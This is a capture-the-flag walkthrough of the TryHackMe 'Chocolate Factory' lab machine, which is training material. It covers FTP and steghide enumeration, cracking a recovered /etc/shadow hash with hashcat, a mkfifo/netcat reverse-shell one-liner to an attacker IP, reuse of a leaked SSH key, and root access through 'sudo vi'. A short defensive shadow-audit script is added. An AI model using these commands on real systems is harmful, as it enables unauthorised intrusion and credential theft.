THM — Chocolate Factory (beginner friendly)

Difficulty: Easy

https://tryhackme.com/room/chocolatefactory

1. Enumeration

nmap -A -vv 10.10.104.219


-A: enables OS detection, version detection, script scanning, and traceroute.

In the nmap output I find an interesting item worth exploring:

http://localhost/key_rev_key

followed by a telling message: You will get the key here.

I browse to port 80 of the machine’s IP.

A download prompt appears; I save the file, called key_rev_key, and print out its contents with cat to get a key.

From the nmap scan result:

ftp-anon: Anonymous FTP login allowed

This means that I can log in via FTP to the machine's IP as the anonymous user, with no password required.

2. Exploitation

That gives me the next step. Let's log in:

ftp 10.10.104.219

Type anonymous at the Name prompt and press Enter.

I browse around (using the dir command) and find an image, which I download (using the get command).

Now for the stego part: I analysed the image with steghide.

steghide info gum_room.jpg

There is an embedded file, "b64.txt".

I extract it by typing:

steghide extract -sf gum_room.jpg

b64 stands for base64, so I base64-decoded the contents of b64.txt using CyberChef:

https://gchq.github.io/CyberChef/


The decoded output is the file that stores all the password hashes on a Linux system: /etc/shadow.

Therefore, cracking Charlie's hash will give you his password in plaintext.

The first two fields of /etc/shadow:

Username: your login name.

Password: your hashed password. The password should be at least 8–12 characters long and include special characters, digits, lower-case letters and more. The password field usually has the format $id$salt$hashed, where $id identifies the algorithm used; on GNU/Linux the values are as follows:

$1$ is MD5

$2a$ is Blowfish

$2y$ is Blowfish

$5$ is SHA-256

$6$ is SHA-512

Ref: https://www.cyberciti.biz/faq/understanding-etcshadow-file/
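As an added example (not part of the original writeup), here is a small defender-side audit that parses /etc/shadow lines using the $id$salt$hashed format described above and flags accounts with a weak hash algorithm or an empty password field. The sample entries are constructed and their hash bodies are dummy text, not real hashes.

```python
import re

# Constructed sample entries (hash bodies are dummy text, not real hashes).
SAMPLE_SHADOW = """root:$6$saltsalt$DUMMYHASHBODY:18500:0:99999:7:::
charlie:$1$saltsalt$DUMMYHASHBODY:18500:0:99999:7:::
daemon:*:18500:0:99999:7:::
guest::18500:0:99999:7:::
"""

# $id$ values as listed above for GNU/Linux crypt-style hashes.
ALGORITHMS = {"1": "MD5", "2a": "Blowfish", "2y": "Blowfish",
              "5": "SHA-256", "6": "SHA-512"}
WEAK = {"MD5"}  # algorithms an auditor would flag for password storage

def parse_shadow_line(line):
    """Split one /etc/shadow line; return user, status and hash algorithm."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2:
        raise ValueError("not a shadow entry: %r" % line)
    user, pw = fields[0], fields[1]
    entry = {"user": user, "status": "hashed", "algorithm": None}
    if pw == "":
        entry["status"] = "empty"       # no password set at all
    elif pw.startswith(("!", "*")):
        entry["status"] = "locked"      # password login disabled
    else:
        m = re.match(r"^\$([^$]+)\$", pw)  # $id$salt$hashed
        entry["algorithm"] = ALGORITHMS.get(m.group(1), "unknown") if m else "legacy"
    return entry

def audit(shadow_text):
    """Return (user, reason) findings a defender would want to review."""
    findings = []
    for line in shadow_text.splitlines():
        if not line.strip():
            continue
        e = parse_shadow_line(line)
        if e["status"] == "empty":
            findings.append((e["user"], "empty password field"))
        elif e["status"] == "hashed" and e["algorithm"] in WEAK:
            findings.append((e["user"], "weak hash algorithm " + e["algorithm"]))
        elif e["status"] == "hashed" and e["algorithm"] in ("legacy", "unknown"):
            findings.append((e["user"], "hash id not in table"))
    return findings

if __name__ == "__main__":
    for user, reason in audit(SAMPLE_SHADOW):
        print(user, "-", reason)
```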

The password cracking tool I used is hashcat.

I extracted the hashed password, removed the username and the colons, and saved it in a text file called hash.txt (feel free to name it whatever you like).

Example of an extracted hash (mind you, it is not the one found in THM, so you have to try on your own! haha):

hashcat -m 1800 -a 0 -o found1.txt hash.txt /usr/share/wordlists/rockyou.txt

Log in to the website's login portal with the credentials found.

A remote command execution is found. (not shown here)

On your own machine, start a netcat listener:

nc -lvnp 9001

Let’s generate a reverse shell.

I usually use the one below. Do not forget to replace the IP with your machine's IP and the port with the one you are listening on.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.53 9001 >/tmp/f

And we gain a shell via netcat.

I don't like to stabilise the shell with python. What if python isn't installed?

I found a fast alternative.

/usr/bin/script -qc /bin/bash /dev/null

Run the above in the shell.

Ctrl+Z

Now enter:

stty raw -echo; fg; reset

Press enter twice.

We are now on the web server. I navigate around and find that I don't have the necessary permission to read user.txt in Charlie's home directory, but I can list the directory's contents.

The file teleport catches my attention.

When I look inside, I find something that looks like an SSH key.

I copy this into a text file, e.g. sshkey.txt, and set its permissions to match those of ordinary SSH keys:

chmod 600 sshkey.txt

ssh charlie@victim_ip -i sshkey.txt

I am now Charlie.

I am now able to view user.txt and read the flag:

cat user.txt

3. Privilege Escalation

Now I want root access to the machine to get the flag in root.txt.

I always run sudo -l to check which binaries I can run with root privileges.

A bit of research and I realise that I can spawn a root shell by running vi with sudo.

sudo vi


I press Esc and enter the command below in vi:

:!/bin/bash

Press Enter.

You are now root.

There is a Python file in the root directory that I can't wait to run.

python root.py


It asks me for a key, so I enter the one I found at the beginning and enjoy the nice ASCII-art message, then print the contents of root.txt ;)

cat root.txt

I hope you enjoyed the read. Have fun with this one.

Sipping water on my island, watching Netflix and hacking while avoiding parties. Special thanks to my boo for encouraging me! ❤